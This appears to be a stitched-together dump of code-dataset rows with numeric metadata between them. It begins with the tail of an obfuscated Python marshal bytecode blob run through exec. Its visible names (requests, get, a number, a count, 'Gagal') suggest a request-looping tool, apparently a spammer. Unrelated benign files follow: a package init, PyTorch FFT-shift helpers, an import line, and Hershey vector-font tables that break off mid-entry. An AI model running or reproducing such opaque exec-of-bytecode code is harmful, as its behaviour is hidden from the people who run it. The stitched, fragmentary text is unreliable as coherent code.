\xe9\x05\x00\x00\x00z\x04[!] z\x06Gagal \xe9\x01\x00\x00\x00)\x19Z\x08requestsr\t\x00\x00\x00r\r\x00\x00\x00Z\x04json\xda\x04timer\x02\x00\x00\x00\xda\x01mr\x08\x00\x00\x00r\x07\x00\x00\x00\xda\x01b\xda\x01p\xda\x01ur\x11\x00\x00\x00r\x18\x00\x00\x00Z\x03banr\x06\x00\x00\x00Z\x03nom\xda\x03intZ\x03jml\xda\x05range\xda\x01x\xda\x03get\xda\x04textZ\x03calr\x0c\x00\x00\x00r\x0f\x00\x00\x00r\x0f\x00\x00\x00r\x0f\x00\x00\x00r\x10\x00\x00\x00\xda\x08<module>\n\x00\x00\x00s*\x00\x00\x00 \x01\x0c\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x02\x08\x0c\x08\x07\x8a\x01\x08\x01 \x01\x1e\x01\x0c\x01\x10\x01\n\x01&\x01\n\x02&\x01\x0c\x02)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x08\x01'))
| 1,397.5
| 5,530
| 0.732021
| 1,216
| 5,590
| 3.300164
| 0.1875
| 0.201844
| 0.172689
| 0.227261
| 0.441814
| 0.388737
| 0.359831
| 0.314229
| 0.291802
| 0.291802
| 0
| 0.352519
| 0.027191
| 5,590
| 4
| 5,530
| 1,397.5
| 0.385436
| 0.007335
| 0
| 0
| 0
| 2
| 0.486842
| 0.469178
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 12
|
712c5ae8b15a0cf7a1905db3a6ce55acc0336956
| 104
|
py
|
Python
|
structmechmod/__init__.py
|
sisl/structmechmod
|
069d680822e9aae7e4e198454048be59d632415d
|
[
"MIT"
] | 5
|
2020-06-11T18:08:08.000Z
|
2020-12-28T15:24:46.000Z
|
structmechmod/__init__.py
|
sisl/structmechmod
|
069d680822e9aae7e4e198454048be59d632415d
|
[
"MIT"
] | 1
|
2020-10-21T04:46:32.000Z
|
2020-10-26T18:50:42.000Z
|
structmechmod/__init__.py
|
sisl/structmechmod
|
069d680822e9aae7e4e198454048be59d632415d
|
[
"MIT"
] | 2
|
2020-06-11T18:07:49.000Z
|
2020-11-13T17:00:34.000Z
|
from structmechmod import rigidbody
from structmechmod import trainer
from structmechmod import models
| 20.8
| 35
| 0.875
| 12
| 104
| 7.583333
| 0.5
| 0.56044
| 0.758242
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 104
| 4
| 36
| 26
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
857756fbb2a1d267ada189e634c659f5ce1ff32b
| 723
|
py
|
Python
|
libs/fft.py
|
gatheluck/FeatureVisualizer
|
cb35a2d9f6581f485638e8607a6ae15cdac886ec
|
[
"MIT"
] | null | null | null |
libs/fft.py
|
gatheluck/FeatureVisualizer
|
cb35a2d9f6581f485638e8607a6ae15cdac886ec
|
[
"MIT"
] | null | null | null |
libs/fft.py
|
gatheluck/FeatureVisualizer
|
cb35a2d9f6581f485638e8607a6ae15cdac886ec
|
[
"MIT"
] | null | null | null |
import torch
def fft_shift(input: torch.Tensor) -> torch.Tensor:
"""
PyTorch version of np.fftshift
Args
- input: (Bx)CxHxWx2
Return
- ret: (Bx)CxHxWx2
"""
dims = [i for i in range(1 if input.dim() == 4 else 2, input.dim() - 1)] # H, W
shift = [input.size(dim) // 2 for dim in dims]
return torch.roll(input, shift, dims)
def ifft_shift(input: torch.Tensor) -> torch.Tensor:
"""
PyTorch version of np.ifftshift
Args
- input: (Bx)CxHxWx2
Return
- ret: (Bx)CxHxWx2
"""
dims = [i for i in range(input.dim() - 2, 0 if input.dim() == 4 else 1, -1)] # H, W
shift = [input.size(dim) // 2 for dim in dims]
return torch.roll(input, shift, dims)
| 24.1
| 88
| 0.583679
| 111
| 723
| 3.783784
| 0.315315
| 0.095238
| 0.071429
| 0.1
| 0.852381
| 0.780952
| 0.780952
| 0.780952
| 0.780952
| 0.780952
| 0
| 0.028302
| 0.266943
| 723
| 29
| 89
| 24.931034
| 0.764151
| 0.24758
| 0
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.222222
| false
| 0
| 0.111111
| 0
| 0.555556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
859867a24e0aac1d56963e7038977cd9833ddd3a
| 45
|
py
|
Python
|
tests/testlib/testlib_a/sublib_b/__init__.py
|
bayashi-cl/expander
|
b3623b656a71801233797e05781295a6101fefd8
|
[
"CC0-1.0"
] | null | null | null |
tests/testlib/testlib_a/sublib_b/__init__.py
|
bayashi-cl/expander
|
b3623b656a71801233797e05781295a6101fefd8
|
[
"CC0-1.0"
] | 1
|
2022-03-12T20:41:21.000Z
|
2022-03-13T06:34:30.000Z
|
tests/testlib/testlib_a/sublib_b/__init__.py
|
bayashi-cl/expander
|
b3623b656a71801233797e05781295a6101fefd8
|
[
"CC0-1.0"
] | null | null | null |
from .sub_ba import print_name_sublib_sub_ba
| 22.5
| 44
| 0.888889
| 9
| 45
| 3.888889
| 0.777778
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088889
| 45
| 1
| 45
| 45
| 0.853659
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 8
|
a420821f20e11fb88460428f0caa416808391f4f
| 37,942
|
py
|
Python
|
hershey.py
|
chrisb2/air-quality
|
9dd0c7b836467b3a262d7e09ae86d4bce6ac8e00
|
[
"MIT"
] | 17
|
2018-07-24T17:41:58.000Z
|
2021-06-23T12:02:21.000Z
|
hershey.py
|
chrisb2/air-quality
|
9dd0c7b836467b3a262d7e09ae86d4bce6ac8e00
|
[
"MIT"
] | null | null | null |
hershey.py
|
chrisb2/air-quality
|
9dd0c7b836467b3a262d7e09ae86d4bce6ac8e00
|
[
"MIT"
] | 3
|
2018-07-24T17:41:59.000Z
|
2019-09-19T19:17:31.000Z
|
"""Hershey Vector Font.
See http://paulbourke.net/dataformats/hershey/
"""
# print(hershey.simplex[0])
simplex = [
[0,16, # Ascii 32
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[8,10, # Ascii 33
5,21, 5, 7,-1,-1, 5, 2, 4, 1, 5, 0, 6, 1, 5, 2,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[5,16, # Ascii 34
4,21, 4,14,-1,-1,12,21,12,14,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[11,21, # Ascii 35
11,25, 4,-7,-1,-1,17,25,10,-7,-1,-1, 4,12,18,12,-1,-1, 3, 6,17, 6,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[26,20, # Ascii 36
8,25, 8,-4,-1,-1,12,25,12,-4,-1,-1,17,18,15,20,12,21, 8,21, 5,20, 3,
18, 3,16, 4,14, 5,13, 7,12,13,10,15, 9,16, 8,17, 6,17, 3,15, 1,12, 0,
8, 0, 5, 1, 3, 3,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[31,24, # Ascii 37
21,21, 3, 0,-1,-1, 8,21,10,19,10,17, 9,15, 7,14, 5,14, 3,16, 3,18, 4,
20, 6,21, 8,21,10,20,13,19,16,19,19,20,21,21,-1,-1,17, 7,15, 6,14, 4,
14, 2,16, 0,18, 0,20, 1,21, 3,21, 5,19, 7,17, 7,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[34,26, # Ascii 38
23,12,23,13,22,14,21,14,20,13,19,11,17, 6,15, 3,13, 1,11, 0, 7, 0, 5,
1, 4, 2, 3, 4, 3, 6, 4, 8, 5, 9,12,13,13,14,14,16,14,18,13,20,11,21,
9,20, 8,18, 8,16, 9,13,11,10,16, 3,18, 1,20, 0,22, 0,23, 1,23, 2,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[7,10, # Ascii 39
5,19, 4,20, 5,21, 6,20, 6,18, 5,16, 4,15,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[10,14, # Ascii 40
11,25, 9,23, 7,20, 5,16, 4,11, 4, 7, 5, 2, 7,-2, 9,-5,11,-7,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[10,14, # Ascii 41
3,25, 5,23, 7,20, 9,16,10,11,10, 7, 9, 2, 7,-2, 5,-5, 3,-7,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[8,16, # Ascii 42
8,21, 8, 9,-1,-1, 3,18,13,12,-1,-1,13,18, 3,12,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[5,26, # Ascii 43
13,18,13, 0,-1,-1, 4, 9,22, 9,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[8,10, # Ascii 44
6, 1, 5, 0, 4, 1, 5, 2, 6, 1, 6,-1, 5,-3, 4,-4,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[2,26, # Ascii 45
4, 9,22, 9,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[5,10, # Ascii 46
5, 2, 4, 1, 5, 0, 6, 1, 5, 2,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[2,22, # Ascii 47
20,25, 2,-7,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[17,20, # Ascii 48
9,21, 6,20, 4,17, 3,12, 3, 9, 4, 4, 6, 1, 9, 0,11, 0,14, 1,16, 4,17,
9,17,12,16,17,14,20,11,21, 9,21,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[4,20, # Ascii 49
6,17, 8,18,11,21,11, 0,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[14,20, # Ascii 50
4,16, 4,17, 5,19, 6,20, 8,21,12,21,14,20,15,19,16,17,16,15,15,13,13,
10, 3, 0,17, 0,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[15,20, # Ascii 51
5,21,16,21,10,13,13,13,15,12,16,11,17, 8,17, 6,16, 3,14, 1,11, 0, 8,
0, 5, 1, 4, 2, 3, 4,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[6,20, # Ascii 52
13,21, 3, 7,18, 7,-1,-1,13,21,13, 0,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[17,20, # Ascii 53
15,21, 5,21, 4,12, 5,13, 8,14,11,14,14,13,16,11,17, 8,17, 6,16, 3,14,
1,11, 0, 8, 0, 5, 1, 4, 2, 3, 4,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[23,20, # Ascii 54
16,18,15,20,12,21,10,21, 7,20, 5,17, 4,12, 4, 7, 5, 3, 7, 1,10, 0,11,
0,14, 1,16, 3,17, 6,17, 7,16,10,14,12,11,13,10,13, 7,12, 5,10, 4, 7,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[5,20, # Ascii 55
17,21, 7, 0,-1,-1, 3,21,17,21,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[29,20, # Ascii 56
8,21, 5,20, 4,18, 4,16, 5,14, 7,13,11,12,14,11,16, 9,17, 7,17, 4,16,
2,15, 1,12, 0, 8, 0, 5, 1, 4, 2, 3, 4, 3, 7, 4, 9, 6,11, 9,12,13,13,
15,14,16,16,16,18,15,20,12,21, 8,21,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[23,20, # Ascii 57
16,14,15,11,13, 9,10, 8, 9, 8, 6, 9, 4,11, 3,14, 3,15, 4,18, 6,20, 9,
21,10,21,13,20,15,18,16,14,16, 9,15, 4,13, 1,10, 0, 8, 0, 5, 1, 4, 3,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[11,10, # Ascii 58
5,14, 4,13, 5,12, 6,13, 5,14,-1,-1, 5, 2, 4, 1, 5, 0, 6, 1, 5, 2,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[14,10, # Ascii 59
5,14, 4,13, 5,12, 6,13, 5,14,-1,-1, 6, 1, 5, 0, 4, 1, 5, 2, 6, 1, 6,
-1, 5,-3, 4,-4,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[3,24, # Ascii 60
20,18, 4, 9,20, 0,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[5,26, # Ascii 61
4,12,22,12,-1,-1, 4, 6,22, 6,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[3,24, # Ascii 62
4,18,20, 9, 4, 0,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[20,18, # Ascii 63
3,16, 3,17, 4,19, 5,20, 7,21,11,21,13,20,14,19,15,17,15,15,14,13,13,
12, 9,10, 9, 7,-1,-1, 9, 2, 8, 1, 9, 0,10, 1, 9, 2,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[55,27, # Ascii 64
18,13,17,15,15,16,12,16,10,15, 9,14, 8,11, 8, 8, 9, 6,11, 5,14, 5,16,
6,17, 8,-1,-1,12,16,10,14, 9,11, 9, 8,10, 6,11, 5,-1,-1,18,16,17, 8,
17, 6,19, 5,21, 5,23, 7,24,10,24,12,23,15,22,17,20,19,18,20,15,21,12,
21, 9,20, 7,19, 5,17, 4,15, 3,12, 3, 9, 4, 6, 5, 4, 7, 2, 9, 1,12, 0,
15, 0,18, 1,20, 2,21, 3,-1,-1,19,16,18, 8,18, 6,19, 5],
[8,18, # Ascii 65
